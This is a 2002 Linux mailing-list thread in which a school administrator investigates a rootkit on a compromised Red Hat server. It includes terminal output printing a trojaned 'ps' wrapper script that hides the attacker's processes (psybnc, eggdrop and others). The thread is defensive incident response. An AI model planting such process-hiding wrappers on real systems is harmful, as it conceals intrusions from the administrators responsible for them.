cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
UW PICO(tm) 4.0 File: ps
#!/bin/sh
# by DoLittle <[EMAIL PROTECTED]> UnderNet / #uzzi
/bin/xps $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.pstmp
cat ~/.pstmp|egrep -v
"dias2002|psybnc|inet|eggdrop|uptime|mech|xps|xw|xwho|xne$
mv ~/.pstmp1 ~/.pstmp >> /dev/null 2>&1
cat ~/.pstmp
rm -fr ~/.pstmp > /dev/null 2>&1
[ Read 7 lines ]
[root@linux bin]# ls ps -l
-rwxr-xr-x 1 root root 295 Mar 20 2002 ps
[root@linux bin]# cd
[root@linux root]# ls -aRl* | grep "/root/.bash_history"
ls: invalid option -- *
Try `ls --help' for more information.
[root@linux root]# ls -aRl * | grep "/root/.bash_history"
[root@linux root]# cd /
[root@linux /]# ls -aRl * | grep "/root/.bash_history"
ls: proc/1070/exe: No such file or directory
ls: proc/17/exe: No such file or directory
ls: proc/2/exe: No such file or directory
ls: proc/221/exe: No such file or directory
ls: proc/3/exe: No such file or directory
ls: proc/4/exe: No such file or directory
ls: proc/5/exe: No such file or directory
ls: proc/6/exe: No such file or directory
ls: proc/7/exe: No such file or directory
ls: proc/8/exe: No such file or directory
ls: proc/9/exe: No such file or directory
ls: proc/92/exe: No such file or directory
----- Original Message -----
From: "dax wood" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, December 12, 2002 10:53 PM
Subject: Re: [sclug-general] security
> the link thing.
>
> go to root.(this will slow stuff down but it will work)
> and type
>
> ls -aRl * | grep "/root/.bash_history"
> and
> follow the stuff
> --- Daniel Kuecker <[EMAIL PROTECTED]> wrote:
> > the .bash_history is root's, ifconfig is in /sbin but it doesnt do
> > anything
> > when i run it, it says file not found. when i tried to telnet to port
> > 1010
> > it refused me
> > ----- Original Message -----
> > From: "dax wood" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Thursday, December 12, 2002 10:37 PM
> > Subject: Re: [sclug-general] security
> >
> >
> > > have you tried telnet 'ing to the open port for some indication of
> > the
> > > program running?
> > >
> > > and try /sbin/ifconfig
> > > or locate ifconfig
> > >
> > > and who's .bash_history file are you talking about
> > > ?
> > >
> > > --- Daniel Kuecker <[EMAIL PROTECTED]> wrote:
> > > > i just ran chkrootkit, it has found a possible LKM infection.
> > port
> > > > 1010 is
> > > > open, nmap says it doesnt know what it is. i cant tell what
> > rootkit
> > > > was
> > > > used. anyone have any ideas on how to stop this? i know the who
> > file
> > > > doesnt
> > > > work, ifconfig doesnt work, .bash_history is linked to another
> > file i
> > > > cant
> > > > find. any suggestions?
> > > > ----- Original Message -----
> > > > From: "dax wood" <[EMAIL PROTECTED]>
> > > > To: <[EMAIL PROTECTED]>
> > > > Sent: Thursday, December 12, 2002 10:22 PM
> > > > Subject: Re: [sclug-general] security
> > > >
> > > >
> > > > >
> > > > > --- Daniel Kuecker <[EMAIL PROTECTED]> wrote:
> > > > > > All,
> > > > > > I have installed a redhat 7.2 box in a local school system.
> > Its
> > > > > > functions include:
> > > > > >
> > > > > > Servers:
> > > > > > FTP
> > > > > > HTTP
> > > > > > SSH
> > > > > > DHCP
> > > > > > DNS
> > > > > > Email
> > > > > >
> > > > > > I have discovered someone created a user account with the
> > home
> > > > dir of
> > > > > > /var/.bash2
> > > > > > they granted themselves group member of a pricipal. i noticed
> > > > three
> > > > > > files in their home dir of what appears to be a root exploit
> > > > called
> > > > > > dr. dolittle. i have not heard of this exploit. anyhow, i
> > > > disabled
> > > > > > the account.
> > > > > > i was curious as to how to prevent this from the future. i
> > > > suspect it
> > > > > > is a student causing this. i am wondering if i can disable
> > the
> > > > shell
> > > > > > access to all except a select few. will this cause problems
> > with
> > > > > > email services, etc?
> > > > > > will this prevent users from getting to a shell to run these
> > > > > > exploits?
> > > > > > any help would be greatly appreciated.....
> > > > > > thanks
> > > > > > daniel kuecker
> > > > > >
> > > > >
> > > > > Best guess would be that some one guessed or manipulated a
> > > > privlaged
> > > > > account password. Look at logs for connections(if this was a
> > real
> > > > > hacker you will not find any thing) Red Hat has drwxr-xr-x on
> > /var?
> > > > so
> > > > > proof of a root hack if that is the case.
> > > > > as far as the shell goes you can allways play with the
> > > > inittab
> > > > > file!
> > > > >
> > > > > In any case you need to upgrade to 8.0 otherwise due to a lot
> > of
> > > > > httpd->apache and openssl security holes your like fish in a
> > > > barrel.
> > > > >
> > > > > I was a kid once( :) _) and i can remember a certain
> > > > area12
> > > > > hack on the schools main servers long ago...... in a mac unix
> > far
> > > > away
> > > > > never at a school do you use pen or pencil as a
> > password
> > > > >
> > > > > ------ted----
> > > > >
> > > > >
> > > > > __________________________________________________
> > > > > Do you Yahoo!?
> > > > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> > > > > http://mailplus.yahoo.com
> > > > >
> > > >
> > >
> > > __________________________________________________
> > > Do you Yahoo!?
> > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> > > http://mailplus.yahoo.com
> > >
> >
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
